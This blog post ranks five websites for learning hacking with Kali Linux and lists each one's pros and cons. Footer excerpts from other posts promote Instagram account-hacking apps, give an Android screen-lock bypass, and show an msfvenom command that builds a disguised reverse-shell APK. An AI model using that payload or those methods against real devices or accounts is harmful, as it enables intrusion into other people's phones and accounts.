Skip to main content

Top 5 websites to Master Hacking with Kali Linux.

Despite writing so many tutorials on hacking with Kali Linux, I often get stuck and have to consult other resources. My blog has a lot of things but since I myself don't know everything, there's no way I can provide all the resources that you guys need. Here's a list of top 5 websites about hacking with Kali Linux that have enough resources to answer 99.9% of your queries, and have enough tutorials to teach you most of the stuff you need to know to get to a level where you can read the more complex stuff on any website.


5. Null Byte

Not dedicated to Kali, but to white hat hacking in general.
 
Advantages-
  • Lot of high quality content
  • Many content-creator / authors
  • Has a forum as well to ask questions
  • Active comments section
Disadvantages-
  • Not tailored to Kali
  • Navigation not very intuitive. Hard to find out stuff related to Kali.
 

4. Hacking-Tutorial

Very old website. Most websites in this list are fairly new, and probably didn't write tutorials for backtrack (Kali is what came after Backtrack 5 r3, instead of backtrack 6). However, this website was around before the time of Backtrack 5 R1 (when the the display manager was not started by default, and we had to use startx command just to get a GUI). 

 
Advantages-
  • Lot of high quality content
  • Mostly articles pertain to Kali Linux or Backtrack (the old posts). The backtrack ones will work with Kali without any changes in commands/procedure.
  • Only one author, so all posts are from one guy, means less low quality posts.
Disadvantages-
  • Design looks cluttered. Too many sharing widgets.
  • Only one author on this website, while it had it's advantage, there are disadvantages too. There's only so much good stuff one person can write.
 

3. Hacking Tutorials


Fairly new, pretty looking and frequently updated website.

 
Advantages-
  • The homepage is quite good and has posts organized by categories.
  • Content is high quality (I said this for every damn website I posted here, but then they made it to the list because of the high quality content).
  • Has many tutorials that you may not find on other websites (most sites have redundant tutorials, all the sites I've mentioned here will have a post about aircrack-ng, etc., but this site has some uncommon attacks and tools covered as well).
Disadvantages-
  • Not well organized content. You might end up reading something whose prerequisites you don't know and you can't understand what's going on in the tutorial.
  • Some very long posts doing stuff no one gives a rats ass about. Basically, lots of unnecessary content. I guess that comes as a side effect of having uncommon tutorials that won't be found on other websites. There's a reason why they aren't on most websites. It's because no is interested in reading them.

 

2. Black More Ops

Not limited to Kali Linux, has a lot of hacking tutorials.

 
Advantages-
  • While it's not limited to Kali, most of the content is focused on Kali
  • Again, lots of high quality content.
  • Navigation much easier
Disadvantages-
  • Some of the posts have nothing but a Youtube video, with no content to go along with it.
  • Some posts are news articles, instead of tutorials. Many people may not mind this, but some may.

 

1. Security Tube

This one has been around for ages too. However, it isn't providing any new free content anymore (but there's a lot of old content which is golden). The owner is now selling certified courses. (the creator is a badass, has written books, sells courses, discovered vulnerabilities and written attacks for WEP, etc.). 

 
Advantages-
  • Gold mine of resources if you're really interested in getting into hacking. No script kiddie stuff. The owner makes video tutorials and groups them up into megaprimers. Everything I know about wireless hacking I learnt from his wireless hacking megaprimer (the videos are free, the certification, if you want, will cost you).
  • I haven't stressed this enough, no script kiddie stuff. He actually has two assembly language megaprimers (again, free of cost).
Disadvantages-
  • Megaprimers are in very old operating systems, mostly backtrack 5.
  • Lets be honest, not everyone wants to watch 10 hours of video to learn the intricacies of hacking. Some are happy using tools and not caring about why or how they work. Unless you want to pursue a career in security, knowing how to use the tools would often be enough.
Despite the disadvantages, it's an awesome website. If you are really a security enthusiast, this is the go to site. All the other sites I've mentioned, as well as my blog, can't give you the in depth knowledge you can get from there. 

Comments

Popular posts from this blog

Top 10 Free Instagram Hacker App For iPhone and Android.

Top 10 Free Instagram Hacker App For iPhone and Android Posted by Nagesh ;) Instagram is no doubt one of the most used apps when it comes to uploading and sharing pictures with your friends and families. However, as much as you may like to use Instagram, the fact remains that anyone can access your account with or without your consent. How is this possible you may ask? The answer lies in the Instagram hacker app. Yes!! You heard right. An Instagram hacker app is a type of an app that works by retrieving passwords and other login details from a target account. As it stands, since Instagram is available on both the Android and iOS platforms, these apps can be found on this platforms as well. These Instagram hack apps are efficient when it comes to hacking passwords, so it's best to be guaranteed that they will hack your IG account in a matter of minutes. Part 1: 5 Free Instagram Hacker App For iPhone Part 2: 5 Free Instagram Hacker App For Android Part 3: Using ...

HOW TO HACK ANDROID USING KALI LINUX 2017 (METASPLOIT)

Getting an access of victim devices (Computer, Android based Phone) is very easy because of reverse exploitation ttacks. A hacker use different types of exploitation’s to gaining access like reverse_tcp, reverse_http and many more with various types of file format (.exe .bat .apk). A payload which is created using reverse_tcp, When victim download that file and install it then it created a reverse connection victim to attacker. There is may be the victim having firewall or some other defense system, In this attack the firewall looks that the client (victim) to send request to the server (attacker machine) that’s why it allow the connection. In this tutorial, I am going to show how we can create a android payload and by using that how can we gaining access of victim device. Open terminal: msfvenom -p android/meterpreter/reverse_tcp set lhost=192.168.0.100 -o fun.apk Where LHOST is the listening host (In my case this is my private IP as per my lab environment), You can ...

How to Bypass your Android Mobile Screen Lock Easily

How to Bypass your Android Mobile Screen Lock Easily METHOD I Solution For Everyone With Recovery (Cwm, Twrp, Xrec,Etc…) Installed: INSTRUCTIONS: 1. Download this zip Pattern Password Disable (Download from attachments) on to your sdcard (using your PC, as you cant get into your phone, right ) 2. Insert the sdcard into your phone 3. Reboot into recovery mode 4. Flash the zip 5. Reboot 6. Done! Note:  If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry. Just Try Any Random Pattern Or Password And it Should Unlock. METHOD 2 Solution For Everyone Without Recovery Installed – ADB: What You Need: =>A computer running a Linux distro or Windows+Cygwin =>USB cable to connect your phone to the PC =>Adb installed How to install adb: 1. Open Terminal 2. Type: “sudo apt-get install android-tools-adb” -> Hit [Enter] 3. Follow the instructions until everything is installed. INSTRUCTIONS: 1. Connect you (turned on) Phone to...